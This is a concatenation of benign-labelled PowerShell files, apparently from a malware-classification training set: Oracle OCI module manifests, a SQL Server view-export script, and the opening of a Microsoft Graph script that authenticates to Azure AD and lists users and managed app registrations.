# AehQsIDPK3KZTQABAAAB6DANBglghkgBZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkD
# MQ0GCyqGSIb3DQEJEAEEMC8GCSqGSIb3DQEJBDEiBCAQzVFazhe0bqkzveAkG5LZ
# JavWYfbjgujOVT7L2YqGCjCB+gYLKoZIhvcNAQkQAi8xgeowgecwgeQwgb0EICrS
# 2sTVAoQggkHR59pNqige0xfJT2J3U8W1Sc8H+OsdMIGYMIGApH4wfDELMAkGA1UE
# BhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc
# BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0
# IFRpbWUtU3RhbXAgUENBIDIwMTACEzMAAAHoULCAzytymU0AAQAAAegwIgQgxcT8
# wE4r7fHdUwqPg1gDV3Rr7AFdS9vOhWvEKaVoFfwwDQYJKoZIhvcNAQELBQAEggIA
# uqRHG/+YEO4r2eXqAhAP+HJRTiY6EodhqGNFmXRgcjH0llZlxFZAfT4Y6Aj8kKzh
# MGicNO/k+IUeDG1ERhlkl/uvMyD+0nhR+7TmH4ZTkpcQ/TVa1C3TY0rRvVJP19fZ
# PCU1FbuvAjf5E5Uk50yaKJiF3OljSoJnhD/ydeDhiHGQvM3Mwa2vXobLLicjpty6
# INuQBmZWQLruu3UBxJnrs0S0oOX+ilkt0fwDvsJiI1CDoOLsNwP8K5/PkGn/mfkE
# fF8fWylShxLg0thWuqPgvfROuNy4+uSGab4hpAx9M+FDdQAUAw8CQ3YRMA5VP0BE
# i13RlXPj4Mq1tIdmgbzfXweOio5brL3e0w6YjJ2gyFhTqBcIVpYmWsVze+y55Ful
# 00ahvYnLor/3eeS9y9yoNtoIjtUjoosIeufhQNGci0tHsUQPRXmilVdxte8JUOAm
# SuToiNmh5BgDltoAV9rtlGFk7IzhB+M0psL9qqaFguSvyibznsxUnraTiTOw4Pzn
# 8wYCKql5SYm1wHdbFtPdsF37oPXYAaW4bVcJVjTO00hJEVVfDaoZr/qpr/yImu8c
# L8ycQZ1MAwLdoXwZPpMxkV+18Tyf7adgXKHwfxwARzu1pFVASmghHCmTjCzGfFb7
# +FX5LuGScHXUAf2C35p+9wZl3ZoB4Gb45dpOI2IfLWo=
# SIG # End signature block
|
combined_dataset/train/non-malicious/sample_58_71.ps1
|
sample_58_71.ps1
|
#
# Module manifest for module 'OCI.PSModules.Bds'
#
# Generated by: Oracle Cloud Infrastructure
#
#
@{
# Script module or binary module file associated with this manifest.
RootModule = 'assemblies/OCI.PSModules.Bds.dll'
# Version number of this module.
ModuleVersion = '86.0.0'
# Supported PSEditions
CompatiblePSEditions = 'Core'
# ID used to uniquely identify this module
GUID = 'bf0fa8b6-185c-48cd-804a-7e6cda32003d'
# Author of this module
Author = 'Oracle Cloud Infrastructure'
# Company or vendor of this module
CompanyName = 'Oracle Corporation'
# Copyright statement for this module
Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.'
# Description of the functionality provided by this module
Description = 'This modules provides Cmdlets for OCI Bds Service'
# Minimum version of the PowerShell engine required by this module
PowerShellVersion = '6.0'
# Name of the PowerShell host required by this module
# PowerShellHostName = ''
# Minimum version of the PowerShell host required by this module
# PowerShellHostVersion = ''
# Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# DotNetFrameworkVersion = ''
# Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# ClrVersion = ''
# Processor architecture (None, X86, Amd64) required by this module
# ProcessorArchitecture = ''
# Modules that must be imported into the global environment prior to importing this module
RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '86.0.0'; })
# Assemblies that must be loaded prior to importing this module
RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Bds.dll'
# Script files (.ps1) that are run in the caller's environment prior to importing this module.
# ScriptsToProcess = @()
# Type files (.ps1xml) to be loaded when importing this module
# TypesToProcess = @()
# Format files (.ps1xml) to be loaded when importing this module
# FormatsToProcess = @()
# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
# NestedModules = @()
# Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export.
FunctionsToExport = '*'
# Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export.
CmdletsToExport = 'Add-OCIBdsAutoScalingConfiguration', 'Add-OCIBdsBlockStorage',
'Add-OCIBdsCloudSql', 'Add-OCIBdsKafka', 'Add-OCIBdsMasterNodes',
'Add-OCIBdsUtilityNodes', 'Add-OCIBdsWorkerNodes',
'Backup-OCIBdsNode', 'Disable-OCIBdsCertificate',
'Enable-OCIBdsCertificate', 'Enable-OCIBdsMetastoreConfiguration',
'Get-OCIBdsApiKey', 'Get-OCIBdsApiKeysList',
'Get-OCIBdsAutoScalingConfiguration',
'Get-OCIBdsAutoScalingConfigurationsList', 'Get-OCIBdsInstance',
'Get-OCIBdsInstancesList', 'Get-OCIBdsMetastoreConfiguration',
'Get-OCIBdsMetastoreConfigurationsList', 'Get-OCIBdsNodeBackup',
'Get-OCIBdsNodeBackupConfiguration',
'Get-OCIBdsNodeBackupConfigurationsList',
'Get-OCIBdsNodeBackupsList', 'Get-OCIBdsNodeReplaceConfiguration',
'Get-OCIBdsNodeReplaceConfigurationsList',
'Get-OCIBdsOsPatchDetails', 'Get-OCIBdsOsPatchesList',
'Get-OCIBdsPatchesList', 'Get-OCIBdsPatchHistoriesList',
'Get-OCIBdsWorkRequest', 'Get-OCIBdsWorkRequestErrorsList',
'Get-OCIBdsWorkRequestLogsList', 'Get-OCIBdsWorkRequestsList',
'Invoke-OCIBdsCertificateServiceInfo',
'Invoke-OCIBdsExecuteBootstrapScript',
'Invoke-OCIBdsInstallOsPatch', 'Invoke-OCIBdsInstallPatch',
'Invoke-OCIBdsRenewCertificate', 'Invoke-OCIBdsReplaceNode',
'Invoke-OCIBdsTestBdsMetastoreConfiguration',
'Invoke-OCIBdsTestBdsObjectStorageConnection',
'Move-OCIBdsInstanceCompartment', 'Move-OCIBdsShape',
'New-OCIBdsApiKey', 'New-OCIBdsInstance',
'New-OCIBdsMetastoreConfiguration',
'New-OCIBdsNodeBackupConfiguration',
'New-OCIBdsNodeReplaceConfiguration', 'Remove-OCIBdsApiKey',
'Remove-OCIBdsAutoScalingConfiguration', 'Remove-OCIBdsCloudSql',
'Remove-OCIBdsInstance', 'Remove-OCIBdsKafka',
'Remove-OCIBdsMetastoreConfiguration', 'Remove-OCIBdsNode',
'Remove-OCIBdsNodeBackup', 'Remove-OCIBdsNodeBackupConfiguration',
'Remove-OCIBdsNodeReplaceConfiguration', 'Restart-OCIBdsNode',
'Start-OCIBdsInstance', 'Stop-OCIBdsInstance',
'Update-OCIBdsAutoScalingConfiguration', 'Update-OCIBdsInstance',
'Update-OCIBdsMetastoreConfiguration',
'Update-OCIBdsNodeBackupConfiguration',
'Update-OCIBdsNodeReplaceConfiguration'
# Variables to export from this module
VariablesToExport = '*'
# Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export.
AliasesToExport = '*'
# DSC resources to export from this module
# DscResourcesToExport = @()
# List of all modules packaged with this module
# ModuleList = @()
# List of all files packaged with this module
# FileList = @()
# Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell.
PrivateData = @{
PSData = @{
# Tags applied to this module. These help with module discovery in online galleries.
Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Bds'
# A URL to the license for this module.
LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt'
# A URL to the main website for this project.
ProjectUri = 'https://github.com/oracle/oci-powershell-modules/'
# A URL to an icon representing this module.
IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png'
# ReleaseNotes of this module
ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md'
# Prerelease string of this module
# Prerelease = ''
# Flag to indicate whether the module requires explicit user acceptance for install/update/save
# RequireLicenseAcceptance = $false
# External dependent modules of this module
# ExternalModuleDependencies = @()
} # End of PSData hashtable
} # End of PrivateData hashtable
# HelpInfo URI of this module
# HelpInfoURI = ''
# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
# DefaultCommandPrefix = ''
}
|
combined_dataset/train/non-malicious/sample_25_53.ps1
|
sample_25_53.ps1
|
#
# Module manifest for module 'OCI.PSModules.Datalabelingservice'
#
# Generated by: Oracle Cloud Infrastructure
#
#
@{
# Script module or binary module file associated with this manifest.
RootModule = 'assemblies/OCI.PSModules.Datalabelingservice.dll'
# Version number of this module.
ModuleVersion = '82.0.0'
# Supported PSEditions
CompatiblePSEditions = 'Core'
# ID used to uniquely identify this module
GUID = '600a044a-632a-42d0-b1ab-94f26e2f3791'
# Author of this module
Author = 'Oracle Cloud Infrastructure'
# Company or vendor of this module
CompanyName = 'Oracle Corporation'
# Copyright statement for this module
Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.'
# Description of the functionality provided by this module
Description = 'This modules provides Cmdlets for OCI Datalabelingservice Service'
# Minimum version of the PowerShell engine required by this module
PowerShellVersion = '6.0'
# Name of the PowerShell host required by this module
# PowerShellHostName = ''
# Minimum version of the PowerShell host required by this module
# PowerShellHostVersion = ''
# Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# DotNetFrameworkVersion = ''
# Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# ClrVersion = ''
# Processor architecture (None, X86, Amd64) required by this module
# ProcessorArchitecture = ''
# Modules that must be imported into the global environment prior to importing this module
RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '82.0.0'; })
# Assemblies that must be loaded prior to importing this module
RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Datalabelingservice.dll'
# Script files (.ps1) that are run in the caller's environment prior to importing this module.
# ScriptsToProcess = @()
# Type files (.ps1xml) to be loaded when importing this module
# TypesToProcess = @()
# Format files (.ps1xml) to be loaded when importing this module
# FormatsToProcess = @()
# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
# NestedModules = @()
# Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export.
FunctionsToExport = '*'
# Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export.
CmdletsToExport = 'Add-OCIDatalabelingserviceDatasetLabels',
'Get-OCIDatalabelingserviceAnnotationFormatsList',
'Get-OCIDatalabelingserviceDataset',
'Get-OCIDatalabelingserviceDatasetsList',
'Get-OCIDatalabelingserviceWorkRequest',
'Get-OCIDatalabelingserviceWorkRequestErrorsList',
'Get-OCIDatalabelingserviceWorkRequestLogsList',
'Get-OCIDatalabelingserviceWorkRequestsList',
'Import-OCIDatalabelingservicePreAnnotatedData',
'Invoke-OCIDatalabelingserviceSnapshotDataset',
'Move-OCIDatalabelingserviceDatasetCompartment',
'New-OCIDatalabelingserviceDataset',
'New-OCIDatalabelingserviceDatasetRecords',
'Remove-OCIDatalabelingserviceDataset',
'Remove-OCIDatalabelingserviceDatasetLabels',
'Rename-OCIDatalabelingserviceDatasetLabels',
'Update-OCIDatalabelingserviceDataset'
# Variables to export from this module
VariablesToExport = '*'
# Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export.
AliasesToExport = '*'
# DSC resources to export from this module
# DscResourcesToExport = @()
# List of all modules packaged with this module
# ModuleList = @()
# List of all files packaged with this module
# FileList = @()
# Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell.
PrivateData = @{
PSData = @{
# Tags applied to this module. These help with module discovery in online galleries.
Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Datalabelingservice'
# A URL to the license for this module.
LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt'
# A URL to the main website for this project.
ProjectUri = 'https://github.com/oracle/oci-powershell-modules/'
# A URL to an icon representing this module.
IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png'
# ReleaseNotes of this module
ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md'
# Prerelease string of this module
# Prerelease = ''
# Flag to indicate whether the module requires explicit user acceptance for install/update/save
# RequireLicenseAcceptance = $false
# External dependent modules of this module
# ExternalModuleDependencies = @()
} # End of PSData hashtable
} # End of PrivateData hashtable
# HelpInfo URI of this module
# HelpInfoURI = ''
# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
# DefaultCommandPrefix = ''
}
|
combined_dataset/train/non-malicious/2520.ps1
|
2520.ps1
|
param
(
[string]$serverInstance = "STGSQL610",
[string]$tempDir = "C:\Dexma\Logs\",
[string]$filter = "objects",
[switch]$verbose,
[switch]$debug
)
function main()
{
if ($verbose) {$VerbosePreference = "Continue"}
if ($debug) {$DebugPreference = "Continue"}
Get-MSSQL-Views-Csv $serverInstance $tempDir $filter
}
function Get-MSSQL-Views-Csv($serverInstance, $tempDir, $filter)
{
trap [Exception]
{
write-error $("TRAPPED: " + $_.Exception.Message);
continue;
}
$outputFile = $tempDir + "GetViews.csv"
Write-Debug "Validate output path $tempDir"
if (-not (Test-Path -path $tempDir))
{
Write-Host "Unable to validate path to temp directory: $tempDir"
break
}
[void][System.Reflection.Assembly]::LoadWithPartialName("Microsoft.SqlServer.Smo")
[void][System.Reflection.Assembly]::LoadWithPartialName("Microsoft.SqlServer.SqlEnum")
[void][System.Reflection.Assembly]::LoadWithPartialName("Microsoft.SqlServer.SmoEnum")
[void][System.Reflection.Assembly]::LoadWithPartialName("Microsoft.SqlServer.ConnectionInfo")
Write-Debug "Get SMO named instance object for server: $serverInstance"
$namedInstance = New-Object ('Microsoft.SqlServer.Management.Smo.Server') ($serverInstance)
Write-Debug "Exporting filtered views based on filter:$filter to $outputfile"
($namedInstance.databases["master"]).get_views() |
where {$_ -like "*$filter*"} | Export-Csv -path $outputFile
}
main
|
combined_dataset/train/non-malicious/sample_64_45.ps1
|
sample_64_45.ps1
|
#
# Module manifest for module 'OCI.PSModules.Integration'
#
# Generated by: Oracle Cloud Infrastructure
#
#
@{
# Script module or binary module file associated with this manifest.
RootModule = 'assemblies/OCI.PSModules.Integration.dll'
# Version number of this module.
ModuleVersion = '86.2.0'
# Supported PSEditions
CompatiblePSEditions = 'Core'
# ID used to uniquely identify this module
GUID = '5ec25c15-0aff-44af-9aaa-8441460571eb'
# Author of this module
Author = 'Oracle Cloud Infrastructure'
# Company or vendor of this module
CompanyName = 'Oracle Corporation'
# Copyright statement for this module
Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.'
# Description of the functionality provided by this module
Description = 'This modules provides Cmdlets for OCI Integration Service'
# Minimum version of the PowerShell engine required by this module
PowerShellVersion = '6.0'
# Name of the PowerShell host required by this module
# PowerShellHostName = ''
# Minimum version of the PowerShell host required by this module
# PowerShellHostVersion = ''
# Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# DotNetFrameworkVersion = ''
# Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# ClrVersion = ''
# Processor architecture (None, X86, Amd64) required by this module
# ProcessorArchitecture = ''
# Modules that must be imported into the global environment prior to importing this module
RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '86.2.0'; })
# Assemblies that must be loaded prior to importing this module
RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Integration.dll'
# Script files (.ps1) that are run in the caller's environment prior to importing this module.
# ScriptsToProcess = @()
# Type files (.ps1xml) to be loaded when importing this module
# TypesToProcess = @()
# Format files (.ps1xml) to be loaded when importing this module
# FormatsToProcess = @()
# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
# NestedModules = @()
# Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export.
FunctionsToExport = '*'
# Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export.
CmdletsToExport = 'Enable-OCIIntegrationProcessAutomation',
'Get-OCIIntegrationInstance', 'Get-OCIIntegrationInstancesList',
'Get-OCIIntegrationWorkRequest',
'Get-OCIIntegrationWorkRequestErrorsList',
'Get-OCIIntegrationWorkRequestLogsList',
'Get-OCIIntegrationWorkRequestsList',
'Move-OCIIntegrationInstanceCompartment',
'Move-OCIIntegrationInstanceNetworkEndpoint',
'Move-OCIIntegrationPrivateEndpointOutboundConnection',
'New-OCIIntegrationInstance', 'Remove-OCIIntegrationInstance',
'Start-OCIIntegrationInstance', 'Stop-OCIIntegrationInstance',
'Update-OCIIntegrationInstance'
# Variables to export from this module
VariablesToExport = '*'
# Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export.
AliasesToExport = '*'
# DSC resources to export from this module
# DscResourcesToExport = @()
# List of all modules packaged with this module
# ModuleList = @()
# List of all files packaged with this module
# FileList = @()
# Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell.
PrivateData = @{
PSData = @{
# Tags applied to this module. These help with module discovery in online galleries.
Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Integration'
# A URL to the license for this module.
LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt'
# A URL to the main website for this project.
ProjectUri = 'https://github.com/oracle/oci-powershell-modules/'
# A URL to an icon representing this module.
IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png'
# ReleaseNotes of this module
ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md'
# Prerelease string of this module
# Prerelease = ''
# Flag to indicate whether the module requires explicit user acceptance for install/update/save
# RequireLicenseAcceptance = $false
# External dependent modules of this module
# ExternalModuleDependencies = @()
} # End of PSData hashtable
} # End of PrivateData hashtable
# HelpInfo URI of this module
# HelpInfoURI = ''
# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
# DefaultCommandPrefix = ''
}
|
combined_dataset/train/non-malicious/sample_54_11.ps1
|
sample_54_11.ps1
|
#
# Module manifest for module 'OCI.PSModules.Loadbalancer'
#
# Generated by: Oracle Cloud Infrastructure
#
#
@{
# Script module or binary module file associated with this manifest.
RootModule = 'assemblies/OCI.PSModules.Loadbalancer.dll'
# Version number of this module.
ModuleVersion = '85.2.0'
# Supported PSEditions
CompatiblePSEditions = 'Core'
# ID used to uniquely identify this module
GUID = 'f5ec8fef-b511-4f9f-910d-3600a849ca41'
# Author of this module
Author = 'Oracle Cloud Infrastructure'
# Company or vendor of this module
CompanyName = 'Oracle Corporation'
# Copyright statement for this module
Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.'
# Description of the functionality provided by this module
Description = 'This modules provides Cmdlets for OCI Loadbalancer Service'
# Minimum version of the PowerShell engine required by this module
PowerShellVersion = '6.0'
# Name of the PowerShell host required by this module
# PowerShellHostName = ''
# Minimum version of the PowerShell host required by this module
# PowerShellHostVersion = ''
# Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# DotNetFrameworkVersion = ''
# Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# ClrVersion = ''
# Processor architecture (None, X86, Amd64) required by this module
# ProcessorArchitecture = ''
# Modules that must be imported into the global environment prior to importing this module
RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '85.2.0'; })
# Assemblies that must be loaded prior to importing this module
RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Loadbalancer.dll'
# Script files (.ps1) that are run in the caller's environment prior to importing this module.
# ScriptsToProcess = @()
# Type files (.ps1xml) to be loaded when importing this module
# TypesToProcess = @()
# Format files (.ps1xml) to be loaded when importing this module
# FormatsToProcess = @()
# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
# NestedModules = @()
# Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export.
FunctionsToExport = '*'
# Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export.
CmdletsToExport = 'Get-OCILoadbalancer', 'Get-OCILoadbalancerBackend',
'Get-OCILoadbalancerBackendHealth', 'Get-OCILoadbalancerBackendSet',
'Get-OCILoadbalancerBackendSetHealth',
'Get-OCILoadbalancerBackendSetsList',
'Get-OCILoadbalancerBackendsList',
'Get-OCILoadbalancerCertificatesList', 'Get-OCILoadbalancerHealth',
'Get-OCILoadbalancerHealthChecker',
'Get-OCILoadbalancerHealthsList', 'Get-OCILoadbalancerHostname',
'Get-OCILoadbalancerHostnamesList',
'Get-OCILoadbalancerListenerRulesList',
'Get-OCILoadbalancerPathRouteSet',
'Get-OCILoadbalancerPathRouteSetsList',
'Get-OCILoadbalancerPoliciesList',
'Get-OCILoadbalancerProtocolsList',
'Get-OCILoadbalancerRoutingPoliciesList',
'Get-OCILoadbalancerRoutingPolicy', 'Get-OCILoadbalancerRuleSet',
'Get-OCILoadbalancerRuleSetsList', 'Get-OCILoadbalancerShapesList',
'Get-OCILoadbalancersList', 'Get-OCILoadbalancerSSLCipherSuite',
'Get-OCILoadbalancerSSLCipherSuitesList',
'Get-OCILoadbalancerWorkRequest',
'Get-OCILoadbalancerWorkRequestsList',
'Move-OCILoadbalancerCompartment', 'New-OCILoadbalancer',
'New-OCILoadbalancerBackend', 'New-OCILoadbalancerBackendSet',
'New-OCILoadbalancerCertificate', 'New-OCILoadbalancerHostname',
'New-OCILoadbalancerListener', 'New-OCILoadbalancerPathRouteSet',
'New-OCILoadbalancerRoutingPolicy', 'New-OCILoadbalancerRuleSet',
'New-OCILoadbalancerSSLCipherSuite', 'Remove-OCILoadbalancer',
'Remove-OCILoadbalancerBackend', 'Remove-OCILoadbalancerBackendSet',
'Remove-OCILoadbalancerCertificate',
'Remove-OCILoadbalancerHostname', 'Remove-OCILoadbalancerListener',
'Remove-OCILoadbalancerPathRouteSet',
'Remove-OCILoadbalancerRoutingPolicy',
'Remove-OCILoadbalancerRuleSet',
'Remove-OCILoadbalancerSSLCipherSuite', 'Update-OCILoadbalancer',
'Update-OCILoadbalancerBackend', 'Update-OCILoadbalancerBackendSet',
'Update-OCILoadbalancerHealthChecker',
'Update-OCILoadbalancerHostname', 'Update-OCILoadbalancerListener',
'Update-OCILoadbalancerNetworkSecurityGroups',
'Update-OCILoadbalancerPathRouteSet',
'Update-OCILoadbalancerRoutingPolicy',
'Update-OCILoadbalancerRuleSet', 'Update-OCILoadbalancerShape',
'Update-OCILoadbalancerSSLCipherSuite'
# Variables to export from this module
VariablesToExport = '*'
# Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export.
AliasesToExport = '*'
# DSC resources to export from this module
# DscResourcesToExport = @()
# List of all modules packaged with this module
# ModuleList = @()
# List of all files packaged with this module
# FileList = @()
# Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell.
PrivateData = @{
PSData = @{
# Tags applied to this module. These help with module discovery in online galleries.
Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Loadbalancer'
# A URL to the license for this module.
LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt'
# A URL to the main website for this project.
ProjectUri = 'https://github.com/oracle/oci-powershell-modules/'
# A URL to an icon representing this module.
IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png'
# ReleaseNotes of this module
ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md'
# Prerelease string of this module
# Prerelease = ''
# Flag to indicate whether the module requires explicit user acceptance for install/update/save
# RequireLicenseAcceptance = $false
# External dependent modules of this module
# ExternalModuleDependencies = @()
} # End of PSData hashtable
} # End of PrivateData hashtable
# HelpInfo URI of this module
# HelpInfoURI = ''
# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
# DefaultCommandPrefix = ''
}
|
combined_dataset/train/non-malicious/125.ps1
|
125.ps1
|
function Get-AuthToken {
[cmdletbinding()]
param
(
[Parameter(Mandatory=$true)]
$User
)
$userUpn = New-Object "System.Net.Mail.MailAddress" -ArgumentList $User
$tenant = $userUpn.Host
Write-Host "Checking for AzureAD module..."
$AadModule = Get-Module -Name "AzureAD" -ListAvailable
if ($AadModule -eq $null) {
Write-Host "AzureAD PowerShell module not found, looking for AzureADPreview"
$AadModule = Get-Module -Name "AzureADPreview" -ListAvailable
}
if ($AadModule -eq $null) {
write-host
write-host "AzureAD Powershell module not installed..." -f Red
write-host "Install by running 'Install-Module AzureAD' or 'Install-Module AzureADPreview' from an elevated PowerShell prompt" -f Yellow
write-host "Script can't continue..." -f Red
write-host
exit
}
if($AadModule.count -gt 1){
$Latest_Version = ($AadModule | select version | Sort-Object)[-1]
$aadModule = $AadModule | ? { $_.version -eq $Latest_Version.version }
if($AadModule.count -gt 1){
$aadModule = $AadModule | select -Unique
}
$adal = Join-Path $AadModule.ModuleBase "Microsoft.IdentityModel.Clients.ActiveDirectory.dll"
$adalforms = Join-Path $AadModule.ModuleBase "Microsoft.IdentityModel.Clients.ActiveDirectory.Platform.dll"
}
else {
$adal = Join-Path $AadModule.ModuleBase "Microsoft.IdentityModel.Clients.ActiveDirectory.dll"
$adalforms = Join-Path $AadModule.ModuleBase "Microsoft.IdentityModel.Clients.ActiveDirectory.Platform.dll"
}
[System.Reflection.Assembly]::LoadFrom($adal) | Out-Null
[System.Reflection.Assembly]::LoadFrom($adalforms) | Out-Null
$clientId = "d1ddf0e4-d672-4dae-b554-9d5bdfd93547"
$redirectUri = "urn:ietf:wg:oauth:2.0:oob"
$resourceAppIdURI = "https://graph.microsoft.com"
$authority = "https://login.microsoftonline.com/$Tenant"
try {
$authContext = New-Object "Microsoft.IdentityModel.Clients.ActiveDirectory.AuthenticationContext" -ArgumentList $authority
$platformParameters = New-Object "Microsoft.IdentityModel.Clients.ActiveDirectory.PlatformParameters" -ArgumentList "Auto"
$userId = New-Object "Microsoft.IdentityModel.Clients.ActiveDirectory.UserIdentifier" -ArgumentList ($User, "OptionalDisplayableId")
$authResult = $authContext.AcquireTokenAsync($resourceAppIdURI,$clientId,$redirectUri,$platformParameters,$userId).Result
if($authResult.AccessToken){
$authHeader = @{
'Content-Type'='application/json'
'Authorization'="Bearer " + $authResult.AccessToken
'ExpiresOn'=$authResult.ExpiresOn
}
return $authHeader
}
else {
Write-Host
Write-Host "Authorization Access Token is null, please re-run authentication..." -ForegroundColor Red
Write-Host
break
}
}
catch {
write-host $_.Exception.Message -f Red
write-host $_.Exception.ItemName -f Red
write-host
break
}
}
Function Get-AADUser(){
[cmdletbinding()]
param
(
$userPrincipalName,
$Property
)
$graphApiVersion = "v1.0"
$User_resource = "users"
try {
if($userPrincipalName -eq "" -or $userPrincipalName -eq $null){
$uri = "https://graph.microsoft.com/$graphApiVersion/$($User_resource)"
(Invoke-RestMethod -Uri $uri -Headers $authToken -Method Get).Value
}
else {
if($Property -eq "" -or $Property -eq $null){
$uri = "https://graph.microsoft.com/$graphApiVersion/$($User_resource)/$userPrincipalName"
Write-Verbose $uri
Invoke-RestMethod -Uri $uri -Headers $authToken -Method Get
}
else {
$uri = "https://graph.microsoft.com/$graphApiVersion/$($User_resource)/$userPrincipalName/$Property"
Write-Verbose $uri
(Invoke-RestMethod -Uri $uri -Headers $authToken -Method Get).Value
}
}
}
catch {
$ex = $_.Exception
$errorResponse = $ex.Response.GetResponseStream()
$reader = New-Object System.IO.StreamReader($errorResponse)
$reader.BaseStream.Position = 0
$reader.DiscardBufferedData()
$responseBody = $reader.ReadToEnd();
Write-Host "Response content:`n$responseBody" -f Red
Write-Error "Request to $Uri failed with HTTP Status $($ex.Response.StatusCode) $($ex.Response.StatusDescription)"
write-host
break
}
}
Function Get-AADUserManagedAppRegistrations(){
[cmdletbinding()]
param
(
$id
)
$graphApiVersion = "beta"
$User_resource = "users/$id/managedAppRegistrations"
try {
if(!$id){
Write-Host "No AAD User ID was passed to the function, specify a valid AAD User ID" -ForegroundColor Red
Write-Host
break
}
else {
$uri = "https://graph.microsoft.com/$graphApiVersion/$User_resource"
(Invoke-RestMethod -Uri $uri -Headers $authToken -Method Get).Value
}
}
catch {
$ex = $_.Exception
$errorResponse = $ex.Response.GetResponseStream()
$reader = New-Object System.IO.StreamReader($errorResponse)
$reader.BaseStream.Position = 0
$reader.DiscardBufferedData()
$responseBody = $reader.ReadToEnd();
Write-Host "Response content:`n$responseBody" -f Red
Write-Error "Request to $Uri failed with HTTP Status $($ex.Response.StatusCode) $($ex.Response.StatusDescription)"
write-host
break
}
}
write-host
if($global:authToken){
$DateTime = (Get-Date).ToUniversalTime()
$TokenExpires = ($authToken.ExpiresOn.datetime - $DateTime).Minutes
if($TokenExpires -le 0){
write-host "Authentication Token expired" $TokenExpires "minutes ago" -ForegroundColor Yellow
write-host
if($User -eq $null -or $User -eq ""){
$User = Read-Host -Prompt "Please specify your user principal name for Azure Authentication"
